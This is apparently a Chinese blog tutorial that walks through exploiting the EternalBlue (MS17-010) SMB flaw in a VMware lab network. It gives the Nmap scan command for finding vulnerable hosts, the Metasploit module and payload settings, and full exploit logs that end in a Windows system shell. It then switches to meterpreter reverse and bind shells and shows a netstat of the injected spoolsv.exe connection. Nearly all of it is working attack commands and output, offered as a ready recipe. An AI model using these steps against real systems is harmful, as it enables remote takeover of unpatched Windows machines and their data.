网络安全/渗透测试/代码审计/
关注
永恒之蓝 = Metasploit+Nmap
使用Nmap
探测内网192.168.119.1
的C
段下那些主机开放了445
端口已经存在ms17-010
漏洞
nmap -p445 –script smb-vuln-ms17-010 192.168.1.1/24
由于我的内网IP
是192.168.119.136
,所以就用这条命令:
nmap -p445 –script smb-vuln-ms17-010 192.168.119.1/24
root@liuwx:~# nmap -p445 --script smb-vuln-ms17-010 192.168.119.1/24
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-10 21:10 CST
Nmap scan report for 192.168.119.1
Host is up (0.00053s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.119.2
Host is up (0.00014s latency).
PORT STATE SERVICE
445/tcp closed microsoft-ds
MAC Address: 00:50:56:E0:1A:4E (VMware)
Nmap scan report for 192.168.119.139
Host is up (0.00024s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:0C:29:BF:20:28 (VMware)
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
Nmap scan report for 192.168.119.254
Host is up (0.00067s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:50:56:EF:68:01 (VMware)
Nmap scan report for 192.168.119.136
Host is up (0.000033s latency).
PORT STATE SERVICE
445/tcp closed microsoft-ds
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.46 seconds
从上图可以看出,在内网中192.168.119.139
这台主机存在ms-17-010
漏洞!
直接上命令:
use exploit/windows/smb/ms17_010_eternalblue
设置好目标IP
,然后run:
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 192.168.119.136:4444
[+] 192.168.119.139:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.119.139:445 - Connecting to target for exploitation.
[+] 192.168.119.139:445 - Connection established for exploitation.
[+] 192.168.119.139:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.119.139:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.119.139:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.119.139:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 192.168.119.139:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.119.139:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.119.139:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.119.139:445 - Sending all but last fragment of exploit packet
[*] 192.168.119.139:445 - Starting non-paged pool grooming
[+] 192.168.119.139:445 - Sending SMBv2 buffers
[+] 192.168.119.139:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.119.139:445 - Sending final SMBv2 buffers.
[*] 192.168.119.139:445 - Sending last fragment of exploit packet!
[*] 192.168.119.139:445 - Receiving response from exploit packet
[+] 192.168.119.139:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.119.139:445 - Sending egg to corrupted connection.
[*] 192.168.119.139:445 - Triggering free of corrupted buffer.
[*] Command shell session 4 opened (192.168.119.136:4444 -> 192.168.119.139:49169) at 2019-10-10 21:14:11 +0800
[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����
C:\Windows\system32>
利用永恒之蓝成功!但返回的只是一个cmdshell
因为msf默认用的paylaod是:payload/windows/x64/shell/reverse_tcp
我们可以设置成其他payload
:
set payload windows/x64/meterpreter/reverse_tcp
设置好了show options看需要设置的参数:
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.119.139 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.119.136 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
一般来说只要设置rhosts
和rport
就OK了,其他的msf会自动帮你设置!
最后exploit
运行看看:
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.119.136:4444
[+] 192.168.119.139:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.119.139:445 - Connecting to target for exploitation.
[+] 192.168.119.139:445 - Connection established for exploitation.
[+] 192.168.119.139:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.119.139:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.119.139:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.119.139:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 192.168.119.139:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.119.139:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.119.139:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.119.139:445 - Sending all but last fragment of exploit packet
[*] 192.168.119.139:445 - Starting non-paged pool grooming
[+] 192.168.119.139:445 - Sending SMBv2 buffers
[+] 192.168.119.139:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.119.139:445 - Sending final SMBv2 buffers.
[*] 192.168.119.139:445 - Sending last fragment of exploit packet!
[*] 192.168.119.139:445 - Receiving response from exploit packet
[+] 192.168.119.139:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.119.139:445 - Sending egg to corrupted connection.
[*] 192.168.119.139:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 192.168.119.139
[*] Meterpreter session 5 opened (192.168.119.136:4444 -> 192.168.119.139:49211) at 2019-10-10 21:24:40 +0800
[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.119.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >
可以看到,这个时候就反弹的就是一个meterpreter
会话,具体有哪些功能呵呵,你懂得~
set payload windows/x64/meterpreter/bind_tcp
meterpreter > netstat -ano
Connection list
===============
Proto Local address Remote address State User Inode PID/Program name
----- ------------- -------------- ----- ---- ----- ----------------
tcp 0.0.0.0:135 0.0.0.0:* LISTEN 0 0 712/svchost.exe
tcp 0.0.0.0:445 0.0.0.0:* LISTEN 0 0 4/System
tcp 0.0.0.0:5357 0.0.0.0:* LISTEN 0 0 4/System
tcp 0.0.0.0:49152 0.0.0.0:* LISTEN 0 0 396/wininit.exe
tcp 0.0.0.0:49153 0.0.0.0:* LISTEN 0 0 764/svchost.exe
tcp 0.0.0.0:49154 0.0.0.0:* LISTEN 0 0 928/svchost.exe
tcp 0.0.0.0:49155 0.0.0.0:* LISTEN 0 0 496/services.exe
tcp 0.0.0.0:49156 0.0.0.0:* LISTEN 0 0 2028/svchost.exe
tcp 0.0.0.0:49157 0.0.0.0:* LISTEN 0 0 504/lsass.exe
tcp 192.168.119.139:139 0.0.0.0:* LISTEN 0 0 4/System
tcp 192.168.119.139:4444 192.168.119.136:45747 ESTABLISHED 0 0 1248/spoolsv.exe
tcp 192.168.119.139:49159 192.168.119.136:4444 ESTABLISHED 0 0 1248/spoolsv.exe
tcp 192.168.119.139:49187 118.112.253.1:80 ESTABLISHED 0 0 928/svchost.exe
tcp 192.168.119.139:49188 63.147.242.144:80 ESTABLISHED 0 0 928/svchost.exe
tcp 192.168.119.139:49189 51.143.111.81:80 SYN_SENT 0 0 648/wermgr.exe
tcp6 :::135 :::* LISTEN 0 0 712/svchost.exe
tcp6 :::445 :::* LISTEN 0 0 4/System
tcp6 :::5357 :::* LISTEN 0 0 4/System
tcp6 :::49152 :::* LISTEN 0 0 396/wininit.exe
tcp6 :::49153 :::* LISTEN 0 0 764/svchost.exe
tcp6 :::49154 :::* LISTEN 0 0 928/svchost.exe
tcp6 :::49155 :::* LISTEN 0 0 496/services.exe
tcp6 :::49156 :::* LISTEN 0 0 2028/svchost.exe
tcp6 :::49157 :::* LISTEN 0 0 504/lsass.exe
udp 0.0.0.0:500 0.0.0.0:* 0 0 928/svchost.exe
udp 0.0.0.0:3702 0.0.0.0:* 0 0 1576/svchost.exe
udp 0.0.0.0:3702 0.0.0.0:* 0 0 1576/svchost.exe
udp 0.0.0.0:4500 0.0.0.0:* 0 0 928/svchost.exe
udp 0.0.0.0:5355 0.0.0.0:* 0 0 984/svchost.exe
udp 0.0.0.0:61604 0.0.0.0:* 0 0 1576/svchost.exe
udp 127.0.0.1:1900 0.0.0.0:* 0 0 1576/svchost.exe
udp 127.0.0.1:65412 0.0.0.0:* 0 0 1576/svchost.exe
udp 192.168.119.139:137 0.0.0.0:* 0 0 4/System
udp 192.168.119.139:138 0.0.0.0:* 0 0 4/System
udp 192.168.119.139:1900 0.0.0.0:* 0 0 1576/svchost.exe
udp 192.168.119.139:65411 0.0.0.0:* 0 0 1576/svchost.exe
udp6 :::500 :::* 0 0 928/svchost.exe
udp6 :::3702 :::* 0 0 1576/svchost.exe
udp6 :::3702 :::* 0 0 1576/svchost.exe
udp6 :::4500 :::* 0 0 928/svchost.exe
udp6 :::5355 :::* 0 0 984/svchost.exe
udp6 :::61605 :::* 0 0 1576/svchost.exe
udp6 ::1:1900 :::* 0 0 1576/svchost.exe
udp6 ::1:65410 :::* 0 0 1576/svchost.exe
udp6 fe80::f50f:3929:7979:5c54:1900 :::* 0 0 1576/svchost.exe
udp6 fe80::f50f:3929:7979:5c54:65409 :::* 0 0 1576/svchost.exe
meterpreter >
查看端口监听情况可以看到:
192.168.119.139:4444
与192.168.119.136:45747
进行连接,注入进程是:spoolsv.exe